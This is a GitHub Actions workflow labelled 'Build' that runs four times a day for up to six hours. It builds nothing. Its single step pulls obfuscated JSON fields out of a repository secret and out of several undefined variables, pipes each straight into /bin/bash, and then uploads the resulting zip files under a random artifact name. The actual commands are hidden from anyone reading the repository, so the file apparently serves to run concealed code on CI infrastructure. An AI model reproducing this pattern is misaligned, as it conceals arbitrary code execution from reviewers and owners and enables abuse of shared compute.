name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '33 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          der0: ${{ secrets.der0 }}
        run: |
          printf '%s' "$der0" | jq -r .cpto14165 | /bin/bash
          echo $n25 | jq -r .jga216 | /bin/bash
          echo $vs5 | jq -r .l185 | /bin/bash
          echo $lu0917 | jq -r .tji3383 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: KCUVVu26
          path: "*.zip"
          retention-days: 1
